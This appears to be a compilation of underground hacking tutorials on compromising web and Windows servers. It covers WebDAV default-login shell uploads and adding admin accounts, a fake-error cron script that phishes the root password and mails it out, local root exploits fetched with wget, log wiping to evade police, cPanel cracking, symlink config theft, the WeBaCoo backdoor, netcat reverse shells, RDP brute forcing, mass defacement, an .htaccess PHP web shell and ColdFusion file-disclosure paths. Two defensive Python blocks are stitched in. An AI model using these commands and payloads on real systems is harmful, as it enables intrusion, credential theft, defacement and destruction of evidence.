As you can see there are Start, Stop and Remove Double buttons. All of these will be explained later on, but what you want to do is click the Start button and it will begin to search for IPs with WebDAV on them. Once you have gathered some IPs, like you see in the picture here. Please be aware this was only with about 15 seconds of searching, and your results may differ depending on your connection speed as well as how long you run the application.

After you have all of your IPs, click one so it's highlighted and then right-click it; you will be presented with a popup that looks like this. I have no idea what that actually means (if someone would like to translate and tell me, please feel free), but what it is doing is copying all of the IPs you have scanned. After you have scanned all of the IPs, paste them into a new word document, save it as something you can remember and put it in a convenient location.

After you have saved your collected WebDAV IPs in a word document, open the IP Scanner in the folder. It will look like this. Click the "Get Ip's" button and browse to your recently saved text file. After you have your IPs in place, press the Scan button. What this does is take all of your WebDAV IPs and figure out which ones are vulnerable to this particular exploit. The ones on the right are the ones it scanned, and if you happen to get any in the middle, those are the ones you can exploit. In my case this time I didn't happen to have any that were open to this exploit because I had a limited number of IPs.

After you have gathered some IPs in the middle column and are ready to exploit the server, you can double-check by going to ip/webdav/ in your browser (IP being one of the exploited ones you got); you are looking for an index page that says WebDAV Test page.

After you have confirmed it is ready to go, open "Map network drive"; this can be found by right-clicking Network or My Computer in the Start menu. Click the hyperlink that reads "Connect to a website that you can use to store your documents and pictures". You will be presented with a screen; all you have to do is click Next. Then click Choose a custom network location.

Now this is the important screen; it should look like this. Put the ip/webdav in the text box and click Next.

You should then be prompted with a login box; the default username is wampp and the default password is xampp. Once you have successfully connected you can browse its folders, so now just drag and drop shell.php inside the main directory. After doing so, go to ip/webdav/shell.php; it should look like the following
  • 116.
    Feel free touse that Ip if you are that much of a noob and cannot do anything for yourself. Once you are viewing your shell inside the execute textbox your going to want to do the following commands net localgroup administrators SUPPORT /Add What this is doing is making the remote desktop username SUPPORT and the password !password!. So now the last and final step is to open remote desktop and connect using the Ip and the login detail's we have just created. The shell is for you to explore and discover for yourself. Now you may be wondering What can you do once your in? Answer : 1.You can do so much! Plant Rootkits/ Upload your RAT on the server:D 2. I upload my RAT’s incase they try to take back there dedi. 3. Host a web IRC bot or Shell Booter 4. Store files or host websites or shells 5. Make a Botnet! TOOLS: http://dl.dropbox.com/u/18083172/Webdav%20tools.rar
  • 117.
Root server without local root exploit

Many hackers find it difficult to find a local root exploit for rooting the server. So here are a few methods you could try to gain root access without using a local root exploit!

1. Custom Cron Tab Scripts

Cron jobs are tasks that are set to be executed at a specific time. If the root user has created a custom script used by cron, and we can write to this file, we can send a "fake" error message and the root user will probably type in his password.

First, check whether there are any cron job tasks:

crontab -l

If you see any custom script, we must check whether we can write to it. Let's say we have a custom script here: /bin/cronscript. To check whether we can write the file, type:

stat /bin/cronscript

(If you get something like "-rwxrwxrwx" in the output, you can edit the file!)

Let's edit the file and send a fake error message. Make a copy of the original script to /bin/cronscript.bak:

cp /bin/cronscript /bin/cronscript.bak

Edit /bin/cronscript like this:

#!/bin/sh
echo "A System Error Occurred!"
echo ""
echo "Error Code: #131425"
echo ""
echo "Update to get the Latest Patch for this Security Issue."
read -s -p "[sudo] password for root " rootpasswd
echo ""
echo "su: Authentication failure"
echo ""
sudo apt-get update && sudo apt-get upgrade
sudo echo "The Password is: $rootpasswd" > .kod
mail -s "Root's Password" "email@address.com" < .kod
rm .kod
mv cronscript.bak cronscript

You should just replace the underlined parts with your e-mail and the name of the script! After you save the file, type:

chmod +x cronscript

to set it as executable. This script will:
- Send a fake error message
- Request the root password
- Send the password to your e-mail address (make sure the "mail" command exists in /bin)
- Restore the original file

When the script gets executed, the root user will enter his password and it will be sent to you! It would be better if you had some knowledge of Bash programming...

2. Enumerating all SUID Files

An SUID file is any file that any user group has the privileges to access, read and write. What this means for you: you can escalate privileges this way if it is in an important directory, or you can social-engineer a privileged user. To find all SUID files, type:

find / -user root -perm -4000 -print

This will show all the SUID files in your terminal. Take your time and check them, as they can help you escalate privileges!

3. Brute Forcing

I know what you are thinking after seeing the title, but this is different: the tool we are going to use is called Rootdabitch. What is so special about it? The magic of this tool is that it works in the background, so you can leave it working for days until you have results... when the password is cracked it will be mailed to you :) For this you need php shell / reverse shell / SSH access to the target to run the tool. You can get the tool here: Rootdabitch v0.1

Usage: ./rootdabitch.sh youremail@site.com

For kiddies: first download rootdabitch to the server:

wget http://rootdabitch.googlecode.com/files/rootdabitch-0.1.zip

Extract it with the following command:

unzip rootdabitch-0.1.zip

Chmod it to 755:

chmod +x rootdabitch.sh

Finally run the script:

./rootdabitch.sh youremail@site.com

Simply chmod it and run the script. If the password is cracked you will get a mail containing the root password in the file "passwords.txt" attached to the mail.
LINUX SERVER ROOTING

Hello Hax0rtools.com readers, today I will show you how to root a server. Root is the administrator of the whole server. If someone gets root access he can do anything with the server, like delete and copy anything on it, and deface all the home pages (mass deface). There are mainly 3 ways you can get into a server, but here we will take the first method, which is by local root exploit.

NEEDS:
- Netcat (Download from Here)
- Shelled site (Best Shellz Here)
- Local root exploit (which you can find Here, or download this collection Here)

STEPS:
- In the Run program type cmd, then type this (but first save your netcat in that directory):

cd C:\Program Files\Netcat

- After that type:

nc -n -l -v -p 443

and you will get this. Now open the URL where you uploaded your shell and connect using the back connect option in the shell (be careful: some shells do not have this option, and do not use any proxy, Tor or VPN). When the connection is established you will get something like this. Now you have successfully connected. Then we have to get the local root exploit for the kernel version; for example, here we have 2.6.18-374 2011.

- Now we have to upload our exploit into a writable folder. We can simply change directory to the /tmp folder, which is a standard writable folder:

cd /tmp

- To upload your exploit we will use wget. Type:

wget http://www.example.com/exploit.c

Now the exploit will be uploaded to the tmp folder.

(CASE TYPE 1) If you uploaded your exploit as source (exploit.c) then we have to compile it, so type the following command:

gcc exploit.c -o exploit

Note that in the command above, exploit refers to the name of your exploit (exploit.c). If it compiles properly with no errors and warnings then you can proceed; if you get an error then find another exploit.

(CASE TYPE 2) If you uploaded your exploit in a zip file then you have to unzip it by typing the command below:

unzip exploit.zip

- After we have done all the above steps correctly, it's time to give permission, so type:

chmod 777 exploit

- Now it's time to run the exploit, so type:

./exploit

Now the exploit will run and the server will be rooted ;). To check whether we got root, type:

id

or

whoami

NOW HOW TO CLEAR THE LOGS AND COME OUT SAFELY FROM THE SERVER

If you do not want to get caught by the cops then delete the logs using the following commands:

rm -rf /tmp/logs
rm -rf $HISTFILE
rm -rf /root/.ksh_history
rm -rf /root/.bash_history
rm -rf /root/.ksh_history
rm -rf /root/.bash_logout
rm -rf /usr/local/apache/logs
rm -rf /usr/local/apache/log
rm -rf /var/apache/logs
rm -rf /var/apache/log
rm -rf /var/run/utmp
rm -rf /var/logs
rm -rf /var/log
rm -rf /var/adm
rm -rf /etc/wtmp
rm -rf /etc/utmp
history -c
find / -name *.bash_history -exec rm -rf {} \;
find / -name *.bash_logout -exec rm -rf {} \;
find / -name "log*" -exec rm -rf {} \;
find / -name *.log -exec rm -rf {} \;

I hope you have learned how to root a server. My next tutorial will be about how to mass deface after rooting a server.
Cpanel Cracking

Things Required:
- Shelled site (Download Best Shellz Here)
- Cpanel Password Cracker (Download; password: www.hax0rtools.com)

Step By Step Tutorial:
- First open your shell and upload the cPanel password cracker shell.
- Then go down and click on User.
- After you have clicked on User, below you will get all the usernames of the cPanel. Your next step will be to get a good password list for a dictionary attack. After getting it, copy the username and paste it in the username block (above), and paste the password list in the password block. Then finally click on Start.

Tip: the password list should be short and effective.

- When the cracking is finished, you will see the result.
- After getting the login info you can log in by going to www.site.com:2082 or www.site.com/cpanel
Bypass 403 Forbidden and "Cant Read /Etc/Named.Config" Error

Nowadays most Linux kernel servers show this error when you try to symlink the server. Most of the servers which show 403 Forbidden also give the "cant read named.config" error when you try to symlink using scripts like Symlink_Sa or the Madspot Security Team shell, or whatever script is used for automated symlinking. This can be bypassed by reading /etc/passwd, and Symlink_Sa 3.0 can be used to bypass it. I will be posting the download links of the shells I use in this tutorial.

The best scripts which can bypass "cant read /etc/named.conf" are:
1. Config Fucker by Web Root Hack Tools (mass symlink config files)
2. Config Killer by Team Indishell (mass symlink config files, PHP-based script)
3. Symlink Pain [~] allsoft.pl (Perl script to mass symlink config files)
4. Symlink_Sa 3.0 automated symlink script

Usage: for Config Fucker, Config Killer and the Symlink Pain [~] Perl script, just upload them to the server, making sure that you create a new directory first. Upload the script and use the command cat /etc/passwd to read all of /etc/passwd from the server, copy it, open your script, paste it there and click on Get Config, and you're done. Just open the link of the folder you created, e.g. site.com/sen/allsoft.pl: you need to open site.com/sen/ and all config files will be there.

Note: it's better to create a php.ini file before you do this, for 100% results.

I will post the download links for all 4 shells I have mentioned, and I will also be using another private shell which I won't be giving out, for Priv8 issues: the Mannu Shell coded by Team Indishell, which can bypass the "cant read /etc/named.conf" error easily. But a 403 Forbidden server can't be bypassed using this shell. So if we can't symlink to the public_html/ of the website, we can use the Symlink_sa 3.0 script's Symlink Bypass option. Now that we can easily symlink to the /public_html/ path of each website, some servers show a 403 Forbidden error when you try to symlink them, so let's see how to bypass this shit.

For the 403 Forbidden error I will be using the following shells:
1. Dhanush Shell coded by Arjun (this shell automatically creates .htaccess, php.ini and ini.php files after you log in)
2. Mannu Shell by Team Indishell (private!)
3. Symlink_sa 3.0 script

I will be posting the download links for the Dhanush shell and Symlink_sa 3.0 (Mannu shell is private, as I already told you). So what is the trick that lets us bypass 403 Forbidden? It's just the .htaccess and php.ini, which contain the following code:

.htaccess

<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
</IfModule>

php.ini

<?
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include($_GET["file"]);
ini_restore("safe_mode");
ini_restore("open_basedir");
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include($_GET["ss"]);
?>

1.) 403 Forbidden error:
2.) Open the Dhanush Shell, which automatically creates .htaccess, php.ini and ini.php.
3.) Mannu shell to check whether we bypassed the 403 error:
4.) Bypassed 403 Forbidden and got access to the public_html/ path.

Bypassed "can't read /etc/named.conf" and the 403 Forbidden error.
Backdoor a Web Server with WeBaCoo

WeBaCoo (Web Backdoor Cookie) is a web backdoor script-kit that provides a terminal connection over HTTP between client and web server. It is an exploitation tool to maintain access to a (hacked) web server. WeBaCoo was designed to operate under the radar of modern up-to-date AV, NIDS, IPS, network firewalls and application firewalls, providing a stealth mechanism to execute commands on the compromised server. The obfuscated file performs its communication via the HTTP Cookie header, validating HTTP requests and responses from the web server. WeBaCoo provides a way to generate the code for the PHP backdoor using predefined payloads. It also offers a "terminal" mode in which the user can establish a remote connection to the server and execute commands with the privileges of the web service. In many cases this tool is used when a server does not have netcat.

INSTALLATION:

git clone git://github.com/anestisb/WeBaCoo.git
wget http://bechtsoudis.com/data/tools/webacoo-latest.tar.gz
./webacoo.pl -h

COMMANDS:

1) Create an obfuscated backdoor 'backdoor.php' with default settings:
./webacoo.pl -g -o backdoor.php

2) Create a de-obfuscated backdoor 'raw-backdoor.php' using the "transit" function:
./webacoo.pl -g -o raw-backdoor.php -f 4 -r

3) Set up a "terminal" connection to the remote host using the default settings:
./webacoo.pl -t -u http://127.0.0.1/backdoor.php

4) Set up a "terminal" connection to the remote host, configuring some arguments:
./webacoo.pl -t -u http://127.0.0.1/backdoor.php -c "Test-Cookie" -d "TTT"

5) Set up a "terminal" connection to the remote host via HTTP proxy:
./webacoo.pl -t -u http://10.0.1.13/backdoor.php -p 127.0.0.1:8080

6) Set up a "terminal" connection to the remote host via HTTP proxy with basic authentication:
./webacoo.pl -t -u http://10.0.1.13/backdoor.php -p user:password:10.0.1.8:3128

7) Set up a "terminal" connection to the remote host via Tor and record the activity:
./webacoo.pl -t -u http://example.com/backdoor.php -p tor -l webacoo_log.txt

Now, having installed the tool and knowing the commands, we will create the backdoor to get a connection to the web server from the console. For this case I obtained a (hacked) server where I'll upload the backdoor created with the following command:

./webacoo.pl -g -o backdoor.php

backdoor.php is created and placed in the WeBaCoo folder; then upload the file to the (hacked) server and connect to it with the following command:

./webacoo.pl -t -u http://www.sitio-web.com/backdoor.php

The connection to the server is perfect, so you get a very fast connection.

Simple commands: in this case type "load" to see the commands that handle the whole server, which are:

1) MySQL-CLI: MySQL command line module: mysql-cli (e.g. 'mysql-cli 10.0.1.11 admin pass')
2) PSQL-CLI: Postgres command line module: psql-cli (e.g. 'psql-cli 10.0.1.12 root pass testdb')
3) Upload: file upload module: upload (e.g. 'upload exploit.c /tmp/')
4) Download: file download module: download (e.g. 'download config.php')
5) Stealth: stealth enhance module: stealth (e.g. 'stealth /var/www/html')

These commands are easy to use. A brief demonstration with the MySQL-CLI command to connect to the server's db:

1) Download the configuration file:
download configuration.php

2) Open the configuration.php file, copy the MySQL user and password, and type the command:
mysql-cli 127.0.0.1:3306 db_user db_password

3) The tool will connect to MySQL; now we can type show databases; to see all the DBs.

Similarly, use the other commands to upload a local root exploit or download anything from the server. With this tool you no longer need netcat on the web server, or a netcat back connection, which often fails, to connect to a web server.
Web Server Hacking through Command Injection

Hello, folks! Do you know that command injection is the most dangerous web vulnerability? It is a little harder to find. Command injection is also called command execution, code injection, or remote code execution. Well, it's my first post on command injection, so I'll start with a basic and simple tutorial; maybe I'll post some advanced techniques in future, depending on my learning. Command execution is my favorite vulnerability :)

What is Command Injection:

Command injection is one of the most dangerous web vulnerabilities. It occurs when unauthorized commands sent by an attacker to the web server are accepted without proper input validation by an application that is connected to the server's operating system and has no filter or whitelist blocking unwanted commands, which allows an attacker to inject any command on the website's server operating system.

One simple example of command injection: assume that your computer is a web server. As you all know, every web host needs an operating system, called the server OS, like Linux, Windows, Unix etc. Every website has its own server and operating system connected to the World Wide Web. Now, every OS has a terminal, like the command prompt in Windows. Assume that you create a web application that allows any user to ping an IP; then you definitely have to connect your terminal or command prompt to the web application (only an OS terminal connected to the WWW can ping a requested IP). Without any user input filtering and validation, your application blindly trusts the user's request and executes it in the web server's OS terminal. So what if an attacker determines your application is vulnerable to command injection and sends unauthorized commands to the server terminal? He can gain complete access to your web server. It's like you handed your OS terminal to an attacker, and of course if you have control of the OS terminal you can do anything on the web server: shell upload, website defacement, database takeover, creating multiple vulnerabilities, etc.

Understanding Complete Command Injection:

Fine, guys, if you still didn't understand what exactly command injection is and how it works, here is a simple tutorial for you. Just follow the steps below and learn command execution in a day.

Requirements:
- DVWA pen-testing lab or OWASP BWA (DVWA)
- Basic knowledge of Windows CMD and Linux terminal
- A little networking knowledge
- Burp Suite (Not Recommended)
- Brain!

Simple Command Execution tutorial for Beginners:

I'm going to show you a simple command execution tutorial through the OWASP BWA (DVWA) pentest lab running on a virtual machine; we'll execute our command on the server and be able to take down the complete website. As you know, DVWA is already vulnerable to command execution (for pentesting), so we don't need to find it; we directly determine the OS and execute commands. In the image below you can see that Burp Suite found server information. Or you can also use Nmap for more information. If you have a little knowledge of networking you can easily understand what it is and how things work; if you want to learn networking, click here. To become an expert in command execution you have to learn Linux, Python, Perl, C and DOS, not completely, but you must know about 40% to 50%.

So guys, back to the injection attack. Open the DVWA Command Injection vulnerability. As I told you, the DVWA web app allows anyone to ping an IP and is connected to the command prompt (check the source code to see how the web app works). Try to understand exactly how it works and what we have to do to hack the web server. As you know, the complete server can be compromised via command prompt and terminal. Normally we use this command to ping an IP from the Windows command prompt:

ping WEBSITE YOU WANT TO PING

The DVWA web application does the same, which means we're effectively on the command prompt, and as you saw in the source code it doesn't have any type of filter for user input to protect the server from command injection attacks. Now give DVWA a try with one IP request to see how it works. I pinged 127.0.0.1 and it simply worked... now we can use some evil mind to compromise the web server with command injection. Check the vulnerability with the "& ls" command; in general we use "ls" to get the list of files and folders in the directory.

Now any noob can understand that we have complete access to the web server's command prompt, so an attacker can easily compromise the server totally. Let's try this command:

& cd ../../../../../../../../WINDOWS/system32 & dir

You'll get a huge page with the complete directory listing of files and folders; you can also search for cmd.exe. Now, how to hack the complete web server, get the database and all the files, and even gain root access? We just need to upload our backdoor. Click here to learn how to upload the C99 PHP shell backdoor and hack a website using command execution.

Thank you for reading our post. Stay tuned with us, please share it to help us grow, and always feel free to comment and let me know your problems.
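To make the missing validation concrete, here is the DVWA ping pattern in Python beside a hardened version. This is an added example, not DVWA's source: `build_ping_unsafe`, `is_valid_target`, `contains_shell_metachars` and `build_ping_argv` are names chosen here, and the inputs tried in the `__main__` block are the ones from the walkthrough above.

```python
"""Vulnerable ping wrapper next to a hardened one (added example, not DVWA's code)."""
import ipaddress
import re
import subprocess
from typing import List

# Shell metacharacters that let "& ls" or "| id" ride along with the host value.
SHELL_METACHARS = re.compile(r"[&|;`$<>\n\r(){}]")

# RFC 1123 host name: dot-separated labels of letters, digits and hyphens that never
# start with a hyphen, so "-c 100000" style option injection is rejected as well.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$"
)


def build_ping_unsafe(target: str) -> str:
    """The vulnerable pattern: the user value is pasted into one command string that is
    later handed to a shell (shell=True). '127.0.0.1 & ls' therefore runs ping AND ls."""
    return f"ping -c 4 {target}"


def is_valid_target(target: str) -> bool:
    """Allow-list check: either a literal IP address or an RFC 1123 host name."""
    try:
        ipaddress.ip_address(target)
        return True
    except ValueError:
        pass
    return bool(HOSTNAME_RE.match(target))


def contains_shell_metachars(target: str) -> bool:
    """Detection-side check: worth logging and alerting on, even when the request is rejected."""
    return bool(SHELL_METACHARS.search(target))


def build_ping_argv(target: str) -> List[str]:
    """Hardened: validate first, then build an argv list so no shell is ever involved."""
    if not is_valid_target(target):
        raise ValueError(f"rejected ping target: {target!r}")
    return ["ping", "-c", "4", target]


def run_ping_safe(target: str, timeout: float = 10.0) -> str:
    """Execute without a shell; the target can only ever be a single argument to ping."""
    result = subprocess.run(build_ping_argv(target), capture_output=True,
                            text=True, timeout=timeout)
    return result.stdout


if __name__ == "__main__":
    # The probes from the DVWA walkthrough above, plus an option-injection attempt.
    for candidate in ("127.0.0.1", "127.0.0.1 & ls",
                      "& cd ../../../../../../../../WINDOWS/system32 & dir", "-c 100000"):
        print(f"{candidate!r}\n  unsafe string : {build_ping_unsafe(candidate)!r}"
              f"\n  valid target  : {is_valid_target(candidate)}"
              f"\n  metacharacters: {contains_shell_metachars(candidate)}")
```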
How To Hack Windows Servers Using DuBrute 2.2

Hello, today I'm sharing with you how to hack many, many Windows VPSes. All you need are two programs called DuBrute and Vnc_scanner.

Download Links:
Vnc_scanner: Here
DuBrute: Here

How to use?
1) Download both files from the links above.
2) Extract both files anywhere on your PC.
3) Open the Vnc_scanner folder.
4) Open the exe file called vnc_scanner_gui.exe.
5) Select any country.
6) Click on Get Dial List. After the whole IP list has come in:
7) Click on Start Scan. It will scan for working VPS IPs.

After the scan has finished, click on Start parser. It will save the good IPs in a new text file called IPs.txt. Now you need to get the usernames and passwords for the scanned IPs. For that you have to use the hacking software called DuBrute.

1) Open the DuBrute folder.
2) Copy the IPs.txt file from the vnc_scanner folder and paste it into the DuBrute folder.
3) Open DUBrute.exe.
4) Click on Generation.
5) Check the image below.

1st, click on File ip, select the text file called IPs.txt and click Open. 2nd, select File Login and Open, then File Pass and Open. 3rd, click on Make and press OK. Then click on Exit. Now press Start in DuBrute and let it brute the combinations. When a working VPS is found where IP, username and pass match, it is saved in the DuBrute folder in a file called goog.txt, like this: this image shows that I found 3 working VPSes.

Note: both files contain a virus; your anti-virus detects them as a Trojan etc. So when you download them, if your anti-virus is active it will delete your files. If you want to use them you have to turn off your anti-virus, or you can hack VPSes from a VPS like me: I downloaded these files on a VPS and hacked from it ;P. I have used these programs to hack VPSes for the last 1-2 weeks and I hacked around 100 working VPSes.

This is a detailed tutorial about how to hack VPSes. Should you have more doubts about it, feel free to reply here; I am here to help you. Thanks and good luck to all for hacking many, many VPSes.

How to use the VPS: go to Start > Run, type mstsc and press OK. Then put in your VPS IP and click Connect. Then type your ID and pass, then OK. That's it, you are in the Virtual Private Server.

How to change the password of the VPS? Press Ctrl + Alt + End and you will see the option to change the password. Note: you can only change the password if you have permission from the Administrator.

Respect!
Symlink Tutorial for Beginners

What do you mean by symbolic links? In computing, a symbolic link (also symlink or soft link) is a special type of file that contains a reference to another file or directory in the form of an absolute or relative path and that affects pathname resolution.

How to do symlink on a web server? For symlinking you need shell access (GNY, C99, r57 etc.) on a website. It looks like this. Now you need to create 1 directory with any name, like sym, test etc. After creating the directory you need 2 files:
1. A blank .txt file in zip format.
2. .htaccess

The txt file includes this "/"; save it. The .htaccess file includes the code below:

Options Indexes FollowSymLinks
DirectoryIndex test.htm
AddType txt .php
AddHandler txt .php

Save it as ".htaccess". Now you need to upload both files, the zip and the .htaccess. After uploading both files we need to unzip the file using this command:

unzip "file name"

After unzipping you will see a txt file there. Now you need to open the appropriate path in your web browser. It looks like this. Now just click on the 1.txt file that you unzipped from the zip file. After clicking on 1.txt it includes all directories of the web server; check out the image below.

OK, done. Now in symlink we will check the directory path, like
1. /home/"Website Username"/public_html/
2. /hsphere/local/home/c283273/

There are different paths; you just need to check them out. If you click on "home" you will get a 403 error, meaning Forbidden, but never mind; after you get this error you need to add the "Website Username". To find web users you need to execute this command:

cat /etc/passwd

The path is "/home/"website username"/public_html/". After executing the cat command it looks like the image above.

Now just find a specific target that has an ADMIN LOGIN PAGE and CONFIG FILE. How do you find this specific target site? You need the server IP and www.bing.com. To find Joomla, WordPress and PHP sites we can use these dorks:
1. ip:123.x.x.x index.php?option=
2. ip:123.x.x.x "Powered By WordPress"
3. ip:123.x.x.x .php?id=
and more...

Having found the target site, now you need to find the config file. In Joomla the config file name is "configuration.php", in WordPress "wp-config.php", etc. You cannot directly see the file like this:
www.Target.com/wp-config.php
www.Target.com/configuration.php
But when we symlink to the specific target we can show the config file using right click and view source. It looks like the image above. This config file includes the site's database information like database name, username, password etc. After getting this you can log into the site's database and edit or delete specific columns, fields etc. But we need to change the admin password. In many cases the password is in MD5, base64 etc. encrypted form. You need to decrypt it... that's it. After changing the password you know what to do...!!!
MASS DEFACE TUTORIAL

Today I will tell you how to mass deface in a few steps, so let's start.

Things Required:
- Rooted server (check the how to root a Linux server tutorial: Here)
- Mass deface script (Download from Here; password: www.hax0rtools.com)

Step By Step Guide:
- First we have to download our mass deface file, so as usual we will use wget. Type:

wget www.somesite.in/massdeface.zip

- As we have downloaded it as a zip file, we will now unzip it by typing:

unzip massdeface.zip

- Once you have unzipped it, we will run the script by typing:

perl massdeface.pl

- After we have run the script it will show its usage [perl mass.pl /tmp/index.html], so we have to run it accordingly, but before we do so we have to download our deface page using wget. Type:

wget http://www.somesite.com/index.html

- Once we have downloaded our deface page, we run the final command to mass deface. Type:

perl massdeface.pl /tmp/index.html
ATTACKING WEB SERVERS VIA .HTACCESS

A while back I was testing a CMS that had a curious feature: all uploaded files were placed in their own directory. This was not a security enhancement, as the application allowed PHP files to be uploaded. However, I couldn't help asking, what if PHP uploads had been restricted? The answer was .htaccess files. Using SetHandler in a .htaccess file is well known, but does not lead to remote code execution. So after some thinking I put together some self-contained .htaccess web shells. I wrote both a PHP and a server-side-include shell, but other options can easily be added (jsp, mod_perl, etc.).

This works by first diverting the default Apache .htaccess access restriction from within the .htaccess file so we can access it as a URL. Next we reconfigure the .htaccess extension to be treated as a dynamic content script, and finally we have our payload. The attack works because the .htaccess parsing and processing of Apache configuration directives occur before the .htaccess file is processed as a web request. There is a relatively small gotcha: the payload has to be commented out with a # at the start so it doesn't get interpreted by Apache, and likewise the script interpreter must ignore the Apache directives. PHP lends itself well to this, as any content not within the <?php ?> tags is presented as-is.

# Self contained .htaccess web shell - Part of the htshell project
# Written by Wireghoul - http://www.justanotherhacker.com

# Override default deny rule to make .htaccess file accessible over web
<Files ~ "^\.ht">
Order allow,deny
Allow from all
</Files>

# Make .htaccess file be interpreted as php file. This occur after apache has interpreted
# the apache directives from the .htaccess file
AddType application/x-httpd-php .htaccess

###### SHELL ###### <?php echo "\n";passthru($_GET['c']." 2>&1"); ?>###### LLEHS ######

Simply upload the preferred shell as a .htaccess file and then visit the .htaccess file via the URL http://domain/path/.htaccess?c=command for remote code execution. The collection of attack files is accessible from my github htshells repository.
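Each of the three .htaccess tricks on this page (the mod_security-off file in the 403 bypass section, the Options/AddType file in the symlink tutorial, and the self-contained shell above) lives in a per-directory override that the server operator can scan for. The scanner below is an added example rather than project code: `scan_htaccess` and `RECOMMENDED_HTTPD_CONF` are names chosen here, and the four sample files are constructed from the snippets on this page (the shell payload line itself is left out of the sample).

```python
"""Flag .htaccess directives that turn an upload directory into code execution,
source disclosure, symlink browsing or an unfiltered request path (added example)."""
import re
from typing import Dict, List

# Constructed samples, modelled on the .htaccess snippets quoted on this page.
HTSHELL_HTACCESS = r"""# Self contained .htaccess web shell (payload line omitted here)
<Files ~ "^\.ht">
Order allow,deny
Allow from all
</Files>
AddType application/x-httpd-php .htaccess
"""
SYMLINK_HTACCESS = """Options Indexes FollowSymLinks
DirectoryIndex test.htm
AddType txt .php
AddHandler txt .php
"""
MODSEC_OFF_HTACCESS = """<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
</IfModule>
"""
BENIGN_HTACCESS = """RewriteEngine On
RewriteRule ^old$ /new [R=301,L]
ErrorDocument 404 /404.html
Options -Indexes -FollowSymLinks +SymLinksIfOwnerMatch
"""

# Handler/type names that mean "execute this file" rather than "serve it as data".
SCRIPT_HANDLERS = ("php", "cgi", "server-parsed", "perl", "fcgid")

# Server-level mitigation: no per-directory overrides at all under upload roots.
RECOMMENDED_HTTPD_CONF = """\
<Directory "/var/www/html/uploads">
    AllowOverride None
    Options -Indexes -FollowSymLinks -ExecCGI
    php_admin_flag engine off
</Directory>
"""


def scan_htaccess(text: str) -> List[Dict[str, object]]:
    """Return one finding per dangerous directive, with its line number and text."""
    findings: List[Dict[str, object]] = []
    in_ht_files = False  # inside a <Files> block that targets .ht* names

    def hit(lineno: int, line: str, issue: str) -> None:
        findings.append({"line": lineno, "issue": issue, "text": line})

    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        low = line.lower()

        m = re.match(r"(addtype|addhandler|sethandler)\s+(\S+)(.*)", low)
        if m:
            directive, handler, exts = m.groups()
            if any(h in handler for h in SCRIPT_HANDLERS):
                hit(lineno, line, f"{directive} maps {exts.strip() or 'this path'} "
                                  f"to script handler {handler}")
            elif ".php" in exts or ".ht" in exts:
                hit(lineno, line, f"{directive} re-types .php/.ht files as {handler} "
                                  "(source disclosure)")
            continue
        if low.startswith("<files") and ".ht" in low:
            in_ht_files = True
        elif low.startswith("</files"):
            in_ht_files = False
        elif in_ht_files and re.search(r"allow from all|require all granted", low):
            hit(lineno, line, "access control on .ht* files overridden")
        if low.startswith("options"):
            opts = low.replace(" ", "")
            if "followsymlinks" in opts and "-followsymlinks" not in opts:
                hit(lineno, line, "FollowSymLinks enabled (symlinks into other accounts are served)")
            if "indexes" in opts and "-indexes" not in opts:
                hit(lineno, line, "directory listing enabled")
        if re.match(r"sec(filter|rule)engine\s+off", low):
            hit(lineno, line, "mod_security disabled for this directory")
    return findings


if __name__ == "__main__":
    for name, sample in (("htshell", HTSHELL_HTACCESS), ("symlink", SYMLINK_HTACCESS),
                         ("modsec-off", MODSEC_OFF_HTACCESS), ("benign", BENIGN_HTACCESS)):
        print(f"== {name}")
        for f in scan_htaccess(sample):
            print(f"  line {f['line']}: {f['issue']}  <- {f['text']}")
```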
How to Backconnect with netcat

1. You need to download netcat: Windows build http://anonym.to/?http://joncraton.o...at-for-windows ; nc to upload with the shell http://www.multiupload.nl/TOBD6TAOXE
2. Upload nc with the shell.
3. Set chmod 777 on nc:
Quote:
chmod 777 nc
4. Run the command ./nc -vv -l -p [port] -e /bin/bash in the shell:
Quote:
./nc -vv -l -p 4499 -e /bin/bash
5. Open cmd, change directory to where nc is saved (like cd c:\) and run this command: nc -vv [ip target] [port]
Quote:
C:\>nc -vv ip server 4499
6. Now you have a back connect.
    Hacking Cold FusionServers - Part I Today I will go over part I of a few tricks we can use to attack Cold Fusion Servers of various versions using a few published methods. Cold Fusion is an Adobe product targeted at Enterprise and Small Business owners. Probably most commonly known for and associated with CFML or Cold Fusion Markup Language, most visually associated with .cfm files on web servers. CF platforms are built on a Java core and as such it also has some built in features which also allow command execution and database interaction. The following should present you with a few methods you can use to check for common vulnerabilities on these platforms, as well as how to exploit them. Most of these were published ages ago in 2010 but there are still many sites which are either running versions which are un-patchable or just simply running unpatched software still.... I will start this series off with the most common vulnerability first, which is the known Local File Disclosure, or LFI, in the 'locale' parameter (also referenced under: CVE-2010-2861). The LFI vulnerability allows us to read files off of the target system, without any authentication. The neat thing that makes this one different than most LFD is that if we play our cards right we can use this vulnerability as a foothold to further penetrate our target, read and see. We first try to find the admin page, as it is the most commonly vulnerable page, but certainly not the only one. You can typically find it at one of the following locations: /CFIDE/administrator/index.cfm /CFIDE/administrator/enter.cfm /CFIDE/componentutils/index.cfm /CFIDE/componentutils/login.cfmYou can determine the version of the CF Server by simply viewing the login page in most cases as the image usually contains the version graphically, like so:
Knowing the version is important as it helps us to determine the appropriate path to use to try and turn this LFD into something useful. Now if you know the full path to the CF '.properties' file then you're in business, as it contains the CF admin password hashes. The list of possible paths worth trying is as follows:
v6: locale=................CFusionMXlibpassword.propertiesen
v7a: locale=................CFusionMX7libpassword.propertiesen
v7b: locale=................optcoldfusionmx7libpassword.propertiesen
v8: locale=................ColdFusion8libpassword.propertiesen
vJRun: locale=....................JRun4serverscfusioncfusion-earcfusion-warWEB-INFcfusionlibpassword.propertiesen
If you have a successful injection for one of the above files, you will see the password hash(es) show up on the page you're injecting into. It will look a bit like this:
NOTE: In versions 6 & 7 encryption is not enabled by default, although I have never seen a server which did not store the password in hashed form.

